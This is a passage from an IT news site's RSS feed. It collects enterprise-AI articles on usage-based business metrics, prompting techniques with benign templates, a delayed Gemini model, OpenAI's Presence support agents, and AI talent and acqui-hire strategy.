<li>Effective price per credit: The real revenue per credit after discounts, overage and rollover, which can detect revenue leakage and help companies set smarter guide rails.</li>
</ul>



<h3 class="wp-block-heading">Margin reality</h3>



<ul class="wp-block-list">
<li>Credit margin: The gross profit the company earns per credit after subtracting inference costs. This is the core economic unit for AI-native, usage-based businesses — the replacement for gross margin per seat used in SaaS.</li>



<li>Inference-adjusted gross margin: By carving out AI inference costs separately in the P&amp;L statement, you can see true AI margins, avoid hiding deterioration inside blended SaaS margins, and clearly distinguish AI economics from legacy SaaS economics.</li>



<li>Compute leverage ratio: This metric measures how efficiently the business converts compute spend into revenue. It shows whether your AI margins are improving as you scale.</li>



<li>AI-adjusted “Rule of 40”: This updated metric recalibrates the traditional growth and profitability benchmark to account for AI’s lower gross margins and variable inference costs, giving a more accurate picture of business health for AI-native companies.</li>
</ul>



<h3 class="wp-block-heading">Behavioral and value signals</h3>



<ul class="wp-block-list">
<li>Time-to-first outcome: Replaces traditional onboarding metrics. Tracks how fast a customer reaches their first measurable result.</li>



<li>Adoption: AI-native adoption is measured by workflow penetration and active agent density, not seat count. As AI replaces human-driven usage, the unit of adoption shifts from people to automated workflows and agents.</li>



<li>Net credit retention (NCR): Credit-volume retention across the customer base, tracked separately from net recurring revenue to avoid price-change impact.</li>
</ul>



<p class="wp-block-paragraph">Along with these new metrics, the industry’s transformation is prompting companies to retire or recalibrate old SaaS measures, including per-seat ARR as a primary key performance indicator (KPI), traditional magic number calibrated to subscription dynamics, unadjusted Rule of 40, customer success metrics tied to human touchpoints, and blended gross margin without AI COGS carve-outs.</p>



<h2 class="wp-block-heading">What does this mean for enterprise value calculations?</h2>



<p class="wp-block-paragraph">As the internal metrics of success change, so do the ways the investment community measures growth and long-term viability.</p>



<p class="wp-block-paragraph">Increasingly, a company’s valuation multiple depends on whether its revenue behaves like committed subscription ARR or volatile usage ARR, and the commit‑to‑burndown ratio is the metric investors use to decide where the company fits.</p>



<p class="wp-block-paragraph">For example, a business with 80% committed credit ARR could trade closer to subscription comps and one with 80% burndown could trade closer to usage comps even though both have the same types of customers. Being able to proactively explain the commit‑to‑burndown mix can help companies avoid undervaluation.</p>



<p class="wp-block-paragraph">In addition, utilization is expected to replace net promoter scores and seat usage as the primary predictor of churn or expansion. Low utilization guarantees downsizing at renewal, so companies must track utilization cohorts the same way SaaS tracks logo retention cohorts today.</p>



<p class="wp-block-paragraph">We’re also seeing an inversion of the operating model, with R&amp;D and COGS moving up the P&amp;L and sales and marketing (S&amp;M) and customer success (CS) moving down or sideways. The net operating leverage profile is structurally different from classical SaaS, and the cost-to-scale curve looks different too.</p>



<p class="wp-block-paragraph">Finally, credit margin engineering is a hidden value-creation lever. The gap between price per credit and cost per credit is set by the software vendor and can be optimized. Most operators have barely started managing this rigorously, and the ones who do will pull away on margin.</p>



<h2 class="wp-block-heading">What this means for leaders, boards and investors</h2>



<p class="wp-block-paragraph">The shift from classic SaaS metrics to new AI‑native measures isn’t cosmetic. It represents the seismic change the industry is experiencing as AI matures and transforms products and organizations.</p>



<p class="wp-block-paragraph">While these metrics — and perhaps others yet to be determined — may evolve over time, there is no doubt they are already changing how AI companies allocate capital, price products, incent sales teams, evaluate performance and communicate with investors.</p>



<p class="wp-block-paragraph">It’s important to remember that SaaS metrics were practical tools for a specific era of software. As that era draws to a close, winning companies will choose new metrics that shape behavior and drive smart decision-making.</p>



<p class="wp-block-paragraph"><em>The views reflected in this article are the views of the author and do not necessarily reflect the views of Ernst &amp; Young LLP or other members of the global EY organization.</em></p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop asking AI nicely: Here’s how to get work-ready results every time]]></title>
<description><![CDATA[Over the past few years, I have learned that basic prompts produce inconsistent, hallucination-prone results that no executive would trust in production. What turned the tide was my move to advanced prompting techniques. These weren’t theoretical experiments; they became a practical foundation fo...]]></description>
<link>https://tsecurity.de/de/3694396/it-security-nachrichten/stop-asking-ai-nicely-heres-how-to-get-work-ready-results-every-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694396/it-security-nachrichten/stop-asking-ai-nicely-heres-how-to-get-work-ready-results-every-time/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Over the past few years, I have learned that basic prompts produce inconsistent, hallucination-prone results that no executive would trust in production. What turned the tide was my move to advanced prompting techniques. These weren’t theoretical experiments; they became a practical foundation for reliable, measurable outcomes. I want to share the techniques that consistently delivered the biggest gains in my projects, complete with real before-and-after examples, copy-paste templates, lessons from failures and guidance on when to evolve beyond prompting to agentic systems.</p>



<h2 class="wp-block-heading">Why advanced prompting still matters in enterprise settings</h2>



<p class="wp-block-paragraph">Sophisticated prompting remains essential for control, reliability and compliance. If you “ask nicely” and hope for the best, you need deterministic behavior, auditable reasoning and minimal risk of hallucination. Here’s what worked for me.</p>



<h3 class="wp-block-heading">1. Chain-of-Thought (CoT) and its variants: Unlocking step-by-step reasoning</h3>



<p class="wp-block-paragraph"><strong>The problem:</strong> Models would jump to conclusions on complex analysis tasks, especially involving data interpretation or multi-step logic.</p>



<p class="wp-block-paragraph"><strong>What I did:</strong> I started explicitly instructing the model to “think step by step” and show its reasoning.</p>



<p class="wp-block-paragraph"><strong>Before (basic prompt): </strong>“Analyze last quarter’s sales data and recommend three actions.”</p>



<p class="wp-block-paragraph"><strong>After (CoT prompt):</strong></p>



<p class="wp-block-paragraph">“You’re a senior business analyst. Analyze the following sales data step by step: [data]. First, identify the key trends. Second, calculate the rates and anomalies. Third, link findings to business context. Finally, recommend the three prioritized actions with expected impact. Explain your reasoning at each step.”  </p>



<p class="wp-block-paragraph"><strong>Results:</strong> Accuracy and depth improved dramatically.</p>



<p class="wp-block-paragraph"><strong>Variants that worked well:</strong> Self-consistency. I ran the same CoT prompt multiple times and took the majority consensus. This reduced variability significantly.</p>



<p class="wp-block-paragraph"><strong>Template you can use:</strong></p>



<pre class="wp-block-code"><code>You are [expert role]. Solve this problem by thinking step by step.

[Task or question]

For each step:

1. State your observation or calculation.

2. Explain the implication.

3. Proceed only when confident.

Final answer in this format: [structured output]</code></pre>



<h3 class="wp-block-heading">2. Tree-of-Thoughts (ToT): Exploring multiple reasoning paths</h3>



<p class="wp-block-paragraph">For truly complex decisions such as resource allocation or risk assessment, linear CoT isn’t enough. Tree-of-Thoughts lets the model generate and evaluate multiple branches.</p>



<p class="wp-block-paragraph"><strong>Example:</strong> I was helping a client evaluate three potential vendor platforms for an AI deployment. A standard prompt gave a superficial comparison. With ToT</p>



<p class="wp-block-paragraph"><strong>Prompt Snippet:</strong></p>



<pre class="wp-block-code"><code>Explore three different reasoning paths for selecting the best vendor platform:

Path 1: Focus on cost and scalability.

Path 2: Focus on security, compliance and integration.

Path 3: Focus on innovation and long-term roadmap.

For each path, evaluate pros/cons against our requirements [list].

Then, compare the paths and recommend the strongest overall option with justification.</code></pre>



<p class="wp-block-paragraph"><strong>Outcome:</strong> The model surfaced nuanced trade-offs (e.g., one vendor had superior security, but higher integration cost).</p>



<p class="wp-block-paragraph"><strong>When to use:</strong> Strategic planning, troubleshooting or scenarios with high uncertainty and multiple viable approaches.</p>



<h3 class="wp-block-heading">3. ReAct (Reason+ Act) and prompt chaining: Moving toward agentic behavior</h3>



<p class="wp-block-paragraph">One of the biggest leaps I have noticed comes from combining reasoning with tool use and chaining prompts.</p>



<p class="wp-block-paragraph"><strong>ReAct example</strong>: (used in data analytics workflow)</p>



<pre class="wp-block-code"><code>You are an AI analyst with access to tools. For the query below:

1. Reason about what information you need.

2. Choose the appropriate tool or action.

3. Observe the result.

4. Repeat until you can answer confidently.

Query: [user request]</code></pre>



<p class="wp-block-paragraph">In practice, I chained this with retrieval tools. One automated quarterly compliance reporting; the system reasoned about required data, pulled relevant records, validated them, and generated the reports.</p>



<h3 class="wp-block-heading">4. Meta-prompting and self-reflection: Letting the model improve itself</h3>



<p class="wp-block-paragraph">Use the model to refine its own prompt. This is a huge time-saver.</p>



<pre class="wp-block-code"><code>You are an expert prompt engineer. Improve the following prompt for clarity, structure and effectiveness with [target model]. Make it more precise while preserving intent.

Original prompt: [paste]

Provide the improved version and explain your changes.</code></pre>



<p class="wp-block-paragraph">Self-reflection loops (asking the model to critique its own output and revise) are a game-changer for content generation and code-review tasks.</p>



<h3 class="wp-block-heading">5. Multimodal and structured output techniques</h3>



<p class="wp-block-paragraph">With vision-enabled models, I started combining text with images (e.g., uploading architecture diagrams or dashboards).</p>



<p class="wp-block-paragraph"><strong>Tip from experience:</strong> Be extremely specific in describing what the models should focus on.</p>



<h4 class="wp-block-heading">Best practices I learned the hard way</h4>



<ul class="wp-block-list">
<li><strong>Start simple, then layer complexity</strong>: Over-engineered prompts from Day One usually backfire.</li>



<li><strong>Model specific tuning:</strong> Some models respond better to XML delimiters; others to explicit reasoning.</li>



<li><strong>Evaluation and versioning:</strong> Treat prompts like code if you track versions and run automated evals.</li>



<li><strong>Security guardrails:</strong> Always include instructions against prompt injections and respect data boundaries.</li>



<li><strong>When to stop prompting</strong>: For repetitive, high-stakes workflows, move to full agents or an orchestration framework.</li>
</ul>



<h2 class="wp-block-heading">Final takeaways for technical leaders</h2>



<p class="wp-block-paragraph">Advanced prompt engineering has now become a core competency for anyone responsible for enterprise AI outcomes. Start by picking one technique and apply it rigorously to a real business problem. Document before/ after and you will notice why it’s worth mastering.</p>



<p class="wp-block-paragraph">The field continues evolving towards more automated and agentic systems, but the ability to precisely direct AI reasoning remains foundational.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google CEO distracts from Gemini 3.5 Pro delay with talk of Gemini 4 and monthly releases]]></title>
<description><![CDATA[Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent L...]]></description>
<link>https://tsecurity.de/de/3694392/it-security-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694392/it-security-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent LLMs at an almost monthly cadence.</p>



<p class="wp-block-paragraph">His comments came a day after <a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-cyber/" target="_blank" rel="noreferrer noopener">Google unveiled Gemini 3.6 Flash</a> and 3.5 Flash Cyber but offered no update on the release of Gemini 3.5 Pro, the company’s delayed flagship reasoning model that many developers had expected to arrive weeks earlier.</p>



<p class="wp-block-paragraph">Google introduced the Gemini 3.5 family at its annual I/O conference, promising to release the Pro model in June. That timeline has since slipped, with <a href="http://bloomberg.com/news/articles/2026-07-16/google-gemini-launch-delayed-as-tech-falls-short-of-internal-goals" target="_blank" rel="noreferrer noopener">Bloomberg suggesting Gemini 3.5 Pro is months late</a> because the model’s coding performance is falling short of internal expectations, especially when compared to better performance by similar models from OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Instead of revisiting the Gemini 3.5 Pro timeline, Pichai used the earnings call to shift the discussion toward Gemini 4, when asked about how his company planned to navigate an increasingly competitive race to release frontier AI models by to Barclays Investment Bank analyst Ross Sandler.</p>



<p class="wp-block-paragraph">“We are creating a baseline on top of which you will see us rapidly iterate on subsequent model releases. And so picking up pace and releasing models almost at a monthly cadence is part of our road map as we are building Gemini 4 as well,” Pichai said during the <a href="https://www.youtube.com/watch?v=LzExSq9DU9w" target="_blank" rel="noreferrer noopener">call</a>.</p>



<p class="wp-block-paragraph">Sandler’s question followed one from JPMorgan Chase &amp; Co analyst <a href="https://www.linkedin.com/in/douglas-anmuth-9229621/" target="_blank" rel="noreferrer noopener">Douglas Anmuth</a>, who asked Pichai if Google was releasing frontier AI models frequently enough to keep pace with rivals OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Pichai had responded to Anmuth’s question that Google remained confident of competing at the frontier and was investing heavily in a larger Gemini 4 base model.</p>



<p class="wp-block-paragraph">Analysts, though, aren’t as confident as Pichai.</p>



<p class="wp-block-paragraph">While delays to Google’s frontier model roadmap have not triggered an exodus of existing customers, either because of high switching costs or because many enterprises already running multi-model architectures, they have made CIOs evaluating AI platforms more cautious about making new commitments, said <a href="https://www.linkedin.com/in/bhupendrachopra" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, chief revenue officer at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">A monthly model release cadence could prove to be a double-edged sword for enterprises and their CIOs.</p>



<p class="wp-block-paragraph">While a monthly release cadence could help enterprises gain faster access to improvements in model performance, cost and capabilities, it will also require CIOs to invest more heavily in testing, governance and version management to safely adopt those updates, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research.</p>



<p class="wp-block-paragraph">Similarly, <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting, said enterprises will embrace a faster release cadence only if each successive model delivers measurable improvements in performance, cost or safety, rather than simply changing version number.</p>



<p class="wp-block-paragraph">The challenge for CIOs, Jain said, is not just keeping up with model releases; it’s deciding whether each new version is worth the cost of validating it.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.infoworld.com/article/4200818/google-ceo-distracts-from-gemini-3-5-pro-delay-with-talk-of-gemini-4-and-monthly-releases.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Presence raises new questions about enterprise automation and jobs]]></title>
<description><![CDATA[OpenAI has launched Presence, an enterprise service for deploying voice and chat agents that can resolve customer and employee requests, potentially automating some work now handled by frontline support teams.



The agents can answer questions and operate IT systems, and enterprises can decide w...]]></description>
<link>https://tsecurity.de/de/3694393/it-security-nachrichten/openai-presence-raises-new-questions-about-enterprise-automation-and-jobs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694393/it-security-nachrichten/openai-presence-raises-new-questions-about-enterprise-automation-and-jobs/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenAI has launched Presence, an enterprise service for deploying voice and chat agents that can resolve customer and employee requests, potentially automating some work now handled by frontline support teams.</p>



<p class="wp-block-paragraph">The agents can answer questions and operate IT systems, and enterprises can decide what actions the agents may take and when they should seek human approval for actions or transfer a case to a human.</p>



<p class="wp-block-paragraph">OpenAI is already using Presence internally for its English-language phone support channel, where it verifies callers and uses account information to complete approved actions. The company said the system resolves 75% of inbound issues without human assistance.</p>



<p class="wp-block-paragraph">Another OpenAI service, Codex, can be used to monitor agents and suggest updates or improvements to processes. In OpenAI’s own tests, suggestions from Codex helped reduce handoffs to humans by 15 percentage points over 10 days, it said. Presence also includes simulation and evaluation tools that allow companies to test an agent before deployment. The tests assess whether it reaches the correct outcome, follows company policy, and hands a case to an employee when required.</p>



<p class="wp-block-paragraph">OpenAI intends each Presence deployment to deal with one kind of task, for example billing issues, insurance claims, or employee IT service requests, with agents getting only the knowledge and system access required for that task.</p>



<p class="wp-block-paragraph">Presence is not a self-service product: Enterprises will have to sign up for the limited availability program, with integration performed by OpenAI or selected <a href="https://www.computerworld.com/article/4136024/openai-partners-with-consulting-giants-to-deploy-enterprise-ai-agents.html">global systems integrators</a>.</p>



<p class="wp-block-paragraph">Companies exploring or testing Presence include Spanish bank BBVA, which is evaluating the service for everyday banking support in Mexico, and Japanese technology group SoftBank, which is using it in trials involving Japanese-language customer interactions. Australian insurer IAG is assessing whether the technology can help it respond to surges in customer demand during severe weather events.</p>



<h2 class="wp-block-heading">Workforce impact</h2>



<p class="wp-block-paragraph">OpenAI’s announcement did not address the potential effect of Presence on employment. But its claimed automation rate raises questions about how the technology could affect staffing in customer service and other support functions.</p>



<p class="wp-block-paragraph"><a href="https://pareekh.com/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, CEO of Pareekh Consulting, said CIOs should regard the 75% figure as evidence that the technology can work, rather than as a benchmark that every enterprise can expect to reach.</p>



<p class="wp-block-paragraph">Jain said OpenAI’s deployment benefits from being built around the company’s own products and data. Large enterprises may achieve lower automation rates because they must contend with fragmented legacy systems, uneven knowledge bases and more complex compliance demands.</p>



<p class="wp-block-paragraph">“Most organizations should expect lower initial automation levels that improve over time as the AI agent is refined,” Jain said.</p>



<p class="wp-block-paragraph">The first workforce effect is more likely to be <a href="https://www.cio.com/article/4015750/cios-see-ai-prompting-new-it-hiring-even-as-boards-push-for-job-cuts.html">slower hiring than immediate layoffs</a>, according to <a href="https://www.linkedin.com/in/tulikasheel/" target="_blank" rel="noreferrer noopener">Tulika Sheel</a>, senior vice president at Kadence International.</p>



<p class="wp-block-paragraph">“The roles most exposed are likely to be repetitive, high-volume functions such as frontline customer support and routine back-office processing,” Sheel said. “However, I would expect the first impact to be on hiring and team growth rather than immediate large-scale job cuts. Over time, enterprises may redesign roles around AI-assisted workflows, with humans focusing more on complex cases, escalation, and relationship management.”</p>



<p class="wp-block-paragraph">Jain said Tier-1 support agents handling predictable queries would face the most exposure. Broader reductions would become more likely only after companies reorganize their operations around the technology.</p>



<p class="wp-block-paragraph">However, <a href="https://omdia.tech.informa.com/authors/lian-jye-su" target="_blank" rel="noreferrer noopener">Lian Jye Su</a>, chief analyst at Omdia, said Presence is unlikely to increase the threat of job displacement because companies have used similar customer-support automation from vendors such as Genesys, NiCE, Five9 and AWS for years.</p>



<p class="wp-block-paragraph">Enterprises are more likely to use Presence alongside employees, with AI handling routine requests while people remain responsible for work requiring judgment and empathy, Su said.</p>



<h2 class="wp-block-heading">Cost and operational risks</h2>



<p class="wp-block-paragraph">Analysts said CIOs should examine whether Presence can maintain resolution quality as usage grows, since fewer human handoffs could leave employees dealing with a more difficult mix of cases.</p>



<p class="wp-block-paragraph">“The key question is not simply how many tasks AI can handle, but whether it can handle them reliably at scale,” Sheel said.</p>



<p class="wp-block-paragraph">The financial case will depend partly on the cost of connecting Presence to existing systems and maintaining the controls needed to govern its use, according to Jain. “Often the biggest cost of enterprise AI is not tokens but <a href="https://www.computerworld.com/article/4128310/openai-responds-to-claude-cowork-with-its-own-platform-to-help-build-deploy-and-manage-ai-agents.html">integration and governance</a>,” Jain added.</p>



<p class="wp-block-paragraph">Companies will need to determine what systems and data the agents can access, monitor their performance, and audit the actions they take. Those investments could offset early savings.</p>



<p class="wp-block-paragraph">Su said the complexity of enterprise IT will make it difficult for OpenAI to automate entire workflows on its own. Enterprises will still need to work with other technology providers and human employees, while CIOs will favor systems that can be audited and integrated with existing infrastructure.</p>



<p class="wp-block-paragraph">Jain said the economics could improve if companies use the same integrations and governance controls across additional workflows.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to navigate the AI talent wars]]></title>
<description><![CDATA[Cloudflare recently beat Q1 2026 earnings. Revenue up 34% year over year. EPS ahead of consensus. Full-year guidance raised. Then, in the same breath, they announced 1,100 layoffs, 20% of the company. CEO Matthew Prince’s explanation: “The way we work at Cloudflare has fundamentally changed.”



...]]></description>
<link>https://tsecurity.de/de/3694394/it-security-nachrichten/how-to-navigate-the-ai-talent-wars/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694394/it-security-nachrichten/how-to-navigate-the-ai-talent-wars/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph"><a href="https://finance.yahoo.com/markets/stocks/articles/cloudflare-net-q1-earnings-revenues-230528107.html">Cloudflare recently beat Q1 2026 earnings</a>. Revenue up 34% year over year. EPS ahead of consensus. Full-year guidance raised. Then, in the same breath, they announced 1,100 layoffs, 20% of the company. CEO Matthew Prince’s explanation: “The way we work at Cloudflare has fundamentally changed.”</p>



<p class="wp-block-paragraph"><a href="https://finance.yahoo.com/markets/stocks/articles/block-q1-earnings-beat-strong-144200216.html">Block did the same thing</a>. Beat guidance, raised outlook, cut 4,000+ jobs. Both framed it as architecting for the AI era.</p>



<p class="wp-block-paragraph">This is not a contradiction. This is the new math boards are running. And if you’re a CIO who hasn’t started running it yourself, <a href="mailto:https://www.cio.com/article/4077996/cios-be-ready-for-agentic-ai-or-be-out-of-a-job.html">you’re behind</a>.</p>



<h2 class="wp-block-heading">The benchmark has moved</h2>



<p class="wp-block-paragraph">AI-native companies have quietly reset what “efficient” means for a technology organization. Midjourney generates over $500M in revenue with roughly 160 employees, over $3M per head. Anthropic hit a $14B annualized run rate in early 2026 with fewer than 3,000 employees. Across the top AI-native startups, <a href="mailto:https://www.forbes.com/sites/paulbaier/2026/03/31/ai-native-firms-lead-in-revenue-per-employee/">the average revenue per employee is $3.48M</a>, nearly twelve times the traditional SaaS benchmark of $300K.</p>



<p class="wp-block-paragraph"><a href="mailto:https://www.saastr.com/what-to-do-if-your-business-decelerates/">Boards aren’t comparing you to your 2019 self anymore</a>. They’re comparing you to Anthropic.</p>



<p class="wp-block-paragraph">This is the pressure Cloudflare and Block are responding to. They’re not cutting people because the business is struggling. They’re cutting because investors have internalized a new denominator. Headcount is no longer a proxy for capacity; it’s a liability on the efficiency ratio.</p>



<p class="wp-block-paragraph">For CIOs, this creates a hiring problem that looks nothing like the cloud or mobile talent gaps of the past decade. Those gaps were about volume: hire 100 cloud engineers, absorb the cost, build the capability… This one is about density; you’re not looking for 100 people. You’re looking for 10 who can deliver what 100 couldn’t, and justify $1M or more in value per seat.</p>



<p class="wp-block-paragraph">Finding bodies to fill seats has never been easier. Finding people who operate at that level of leverage is a different problem entirely.</p>



<h2 class="wp-block-heading">‘Acqui-hires’ are a shortcut with a hidden cost</h2>



<p class="wp-block-paragraph">Companies have figured out that recruiting AI-native talent one by one is too slow and that it’s faster to buy a team. Google’s acquisition of the Windsurf founders, Meta bringing in the Scale AI team, Accenture’s string of AI-focused acquisitions: <a href="mailto:https://tomtunguz.com/ai-acqui-hire-wave/">these are acqui-hires</a> dressed up as M&amp;A. The premium on experienced AI talent is high enough, and the urgency real enough, that organizations are skipping traditional hiring loops entirely and buying their way in.</p>



<p class="wp-block-paragraph">I’ve been on the other side of this. My company, MadKudu, was acquired by HG Insights specifically to bring AI-native capability into an established enterprise business. HG needed change agents who had already figured out how to build and ship in this new era, not just people who’d read about it. That’s the thesis behind most of these deals.</p>



<p class="wp-block-paragraph">But there’s a cost that doesn’t show up in the acquisition price.</p>



<p class="wp-block-paragraph">AI-native teams are fast because they operate with a different set of defaults: full access to tools, minimal governance layers, the ability to experiment and ship without a six-week approval cycle. That operating model is not a perk; it’s the fundamental mechanism. It’s why a team of 10 can do what an enterprise team of 100 can’t.</p>



<p class="wp-block-paragraph">When you acqui-hire that team and then slot them into your existing approval processes, you’ve bought the people and killed the engine. The change agents you paid for become change-frustrated. The attrition that follows is expensive and predictable.</p>



<p class="wp-block-paragraph">The harder realization: acquiring an AI-native team means accepting how they work. That requires deliberately carving out space for them to operate differently, not just tolerating it but institutionalizing it. The acquisition is an organizational change program, not just a hiring event.</p>



<h2 class="wp-block-heading">The CIO’s real problem</h2>



<p class="wp-block-paragraph">The governance stack most enterprise organizations run was designed for a headcount world. Every tool vetting cycle, every vendor review, every security approval was calibrated assuming you were managing a large team where consistency and control were the primary objectives.</p>



<p class="wp-block-paragraph">That calculus breaks when your goal is talent density. The same approval processes that protect against data leaks are now the reason your best people can’t do their best work. When it takes six weeks to approve a tool that your competitor’s team is already shipping with, you’ve traded velocity for the perception of safety.</p>



<p class="wp-block-paragraph">The practical fix is structured experimentation: clear guardrails, defined boundaries, but explicit permission to try tools before deciding whether to roll them out broadly. Gating everything prevents you from ever discovering what 10x productivity looks like.</p>



<p class="wp-block-paragraph">The skills inventory question is also more nuanced than it sounds. Job titles won’t tell you where the leverage is. You need to map the actual tasks within each function and assess which can be automated or augmented with AI. That’s where you find the people who, with the right tools, become your $1M/employee talent, not because you hired differently, but because you enabled better.</p>



<p class="wp-block-paragraph">This is also where the build-versus-buy question gets genuinely tricky. As AI reshapes how products are built and delivered, your internal operating model — how you work, how fast you ship, how you use data — is becoming core IP. Outsourcing delivery means outsourcing the part of the organization where your competitive advantage is now being built.</p>



<h2 class="wp-block-heading">Closing the gap without slowing down</h2>



<p class="wp-block-paragraph"><a href="mailto:https://www.saastr.com/the-great-ai-talent-grab-the-latest-20vc-with-jason-harry-and-rory/">The AI talent wars</a> are not primarily a recruiting problem. They’re a rethinking of what organizations are supposed to look like.</p>



<p class="wp-block-paragraph">Boards have a new benchmark. Cloudflare, Block, Amazon, Meta and others have already started restructuring to meet it, publicly, painfully, even while beating their numbers. The question for CIOs isn’t whether this pressure arrives; it’s whether you’re ahead of it or behind it when it does.</p>



<p class="wp-block-paragraph">The organizations that navigate this well won’t win by outbidding competitors for a handful of elite engineers. They’ll win by designing operating systems that amplify the leverage of the talent they do have, by enabling their best people rather than constraining them, and by treating AI fluency as a core organizational capability rather than a niche specialization.</p>



<p class="wp-block-paragraph">Talent density is the new headcount model. The sooner your governance, your tooling and your board conversations reflect that, the better positioned you’ll be when the next efficiency report lands.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why I changed how I pitch AI: It’s no longer about saving money, but managing tokens and adoption]]></title>
<description><![CDATA[I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.



The initial hype has ...]]></description>
<link>https://tsecurity.de/de/3694390/it-security-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694390/it-security-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.</p>



<p class="wp-block-paragraph">The initial hype has faded, leaving CIOs to drive real enterprise value. Based on my experience implementing Google, OpenAI and Anthropic technologies, here are the fundamental, technology-agnostic lessons every leader must anchor their strategy around.</p>



<h2 class="wp-block-heading"><a></a>AI as a leadership multiplier</h2>



<p class="wp-block-paragraph">The most common tactical error we see is treating AI as an isolated technology project. What I have observed among our customers is that true success does not come from organizations that define a standalone “AI strategy,” but rather from those leaders that integrate AI into their business strategy.</p>



<p class="wp-block-paragraph">When our customers isolate AI and define an AI strategy, it inevitably treats it like a “technological toy” to experiment with. This approach yields fragmented, orphaned initiatives that fail to scale because they are fundamentally disconnected from their core corporate objectives. What I learned is that AI is not the ultimate destination; it is a powerful catalyst. We have replaced “What can AI do for our customers?” with a more strategic question, “How does AI accelerate their existing business goals?”</p>



<p class="wp-block-paragraph">Think of AI like electricity. No modern corporation designs a standalone “electricity strategy.” Instead, all companies route it invisibly across the entire organization to illuminate offices, power production lines and drive communication. AI must be woven into the enterprise fabric in the exact same way, acting as an underlying utility that supercharges your existing operational model.</p>



